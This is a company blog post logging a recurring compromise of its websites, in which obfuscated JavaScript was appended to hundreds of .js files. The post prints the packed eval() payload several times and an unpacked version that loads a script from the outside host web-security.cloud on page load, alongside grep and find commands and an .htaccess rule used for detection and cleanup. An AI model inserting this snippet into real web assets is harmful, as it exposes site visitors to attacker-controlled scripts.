Stay Tuned!

Subscribe to our newsletter to get our newest articles instantly!

Security

Decoding Website Defacement Attacks: Unmasking the Threat

Background

We found weird behaviour on our websites as the link could not go to the proper URL with the domain; in fact, it went to a third-party link. That’s quite alarming. We then checked Google Analytics, and the traffic went down. There was something not right here!

We started to look further into this issue.

Last updated - 27/05/2023:  Add the Update - 7 section. 

The Detail

We checked the files on the server, and there was a change on 17/04/2022. That was strange as we did not change the files.

We opened up the modified by we found this at the end of the .js file. We look up the backup, and it’s different; there is no code for this:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

We had this situation before in late September 2021, and at that time, it was attacked on .php files.




We do not know how they appended this extra code at the end of the js file.

However, we might have to figure out three ways that the hacker can attack this:

  • Hosting VM using CPanel – not fully control
  • Custom code PHP web application
  • WordPress websites

To mitigate this, we moved the custom code PHP application to a different VM that we can fully control and has no CPanel, while the WordPress site moved to another VM that we can fully control and has no CPanel. We also have some alerts on checking the files if there is a modification/deletion/adding.

UPDATE – 1

This happened again on 4th June 2022, this time attacking js files.




;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

Investigate further about these extra codes and find Unpacker from Matthewfl.com:

Those codes translate as :

document.addEventListener('DOMContentLoaded',function()
	{
	if(typeof window.web_security=="undefined")
		{
		var s=document.createElement("script");
		s.src="//web-security.cloud/event?l=115";
		document.head.appendChild(s);
		window.web_security="success"
	}
}
,false);

To search all affected files (JS or PHP), run the following command and write into a file called – suspiciousfiles.txt

grep --include=\*.{js,php} -rnw '/var/www/[website_url/public_html/' -e "s|document|web_security|window" > suspiciousfiles.txt

Go through that list and remove the extra codes manually, one by one.

UPDATE – 2

On 14th June 2022, as informed by our web developer, we upgraded the web application, and one bug fix is updating the JQuery library to prevent JavaScript vulnerabilities.




We believe this incident is related to JavaScript vulnerabilities within this web application. We hope this will solve the issue.

UPDATE – 3

On 27 July 2022, the website was attacked again, just .js files. It has 400+ files with extra codes at the end. We managed to remove this manually.

UPDATE – 4

On November 2022, the website was attacked again, just .js files. It has 400+ files with extra codes at the end. We haven’t removed this yet, as we are waiting for the developer to investigate this.

;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

Starting to look at deep further into potential write folder access:

find /var/www/[website_url]/public_html/[target_folder] -type f \( ! -iname "*.jpg" -and ! -iname "*.png" -and ! -iname "*.jpeg" -and ! -iname "*.gif" -and ! -iname "*.webp" -and ! -iname ".htaccess" -and ! -iname ".mp4" \)

Nothing suspicious files, only a bunch of .html and .xml files. We look at this one by one – none are considered a threat.




Checked the .htaccess, and it’s pretty good at denying unwanted files.

<Files ~ "\.(php|php2|php3|php4|php5|php7|phtml|pl|py|psp|js|jsp|cgi|util)$">
    Order deny,allow
    Deny From All
</Files>

UPDATE – 5

A similar attack occurred on 11/01/2023. But this time, we found that the .httaccess at the root level has been deleted. We are not sure yet whether it potentially gets removed accidentally when we do maintenance.

As a consequence of this, a file was created called mini.php

UPDATE – 6

A similar attack occurred on 13/04/2023., but this time, the appended code is without flatting the code:

;
document.addEventListener('DOMContentLoaded', function(){
    if(typeof window.web_security == "undefined"){
        var s = document.createElement("script");
        s.src = "//web-security.cloud/event?l=115";
        document.head.appendChild(s);
        window.web_security = "success";
    }
}, false);
;

Because the above folders have the same permission, it updated our maintenance folder (backup one). The solution is to create compressed backup folders and files.




Also, we then added the following search:

grep --include=\*.{js,php} -rnw '/var/www/[website_url/public_html/' -e "web_security.cloud" > suspiciousfiles_2.txt

UPDATE – 7

A similar attack occurred on 15/04/2023; the appended code is without flatting the code:

;
document.addEventListener('DOMContentLoaded', function(){
    if(typeof window.web_security == "undefined"){
        var s = document.createElement("script");
        s.src = "//web-security.cloud/event?l=115";
        document.head.appendChild(s);
        window.web_security = "success";
    }
}, false);
;

Because the above folders have the same permission, it updated our maintenance folder (backup one). The solution is to create compressed backup folders and files.

Also, we then added the following search:

grep --include=\*.{js,php} -rnw '/var/www/[website_url/public_html/' -e "web-security.cloud" > suspiciousfiles_2.txt

The End

If you have reached the end of this article, congratulation. Hopefully, we have shed some light on outlining what you need to know by exposing the attack on the website.




We write this so that this is not a fixed article. Like in this journey, We learn as we go and re-write some parts of the article, so please keep pinging with this article or any general tech posts.

We also would love to hear about how you deal with the situation and what IT-related challenges you might face. Please feel free to comment on this article, or you can contact us on the Dewacorp website for your IT support, application integration, application development, or other IT-related. Alternatively, you can casually have a chat on Dewachat. Let us know if you have any questions that we can help with!

Big thank you for the photo by Tima Miroshnichenko on Pexels.

To boost your product and service to the broader web community, visit our Dewalist classified website – home to 30,000+ active users and 40,000+ active advertising so far. Check it out!

If you love this security article or any security posts and you would like to receive an update of this article or our latest post, please sign up for the form below:




Newsletter signup

This is a newsletter for tech, creative, gadgets, games and crypto.

Please wait...

Thank you for sign up!

Avatar

Dewacorp Support

About Author

You may also like

Feature Security

How to Harden the Ubuntu Server in 2022

Background As I wrote the blog – A Complete Setup Guide for Contabo VPS Ubuntu 20.04 with preinstalled Webmin +
Security

How to Harden Router Security for Home/Office in 2022

Background As configured more routers on-site either in the office or home-office environment, we started to compile on how to